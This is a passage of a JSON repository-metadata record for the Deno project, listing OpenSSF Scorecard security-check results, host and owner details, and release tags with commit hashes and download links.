'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"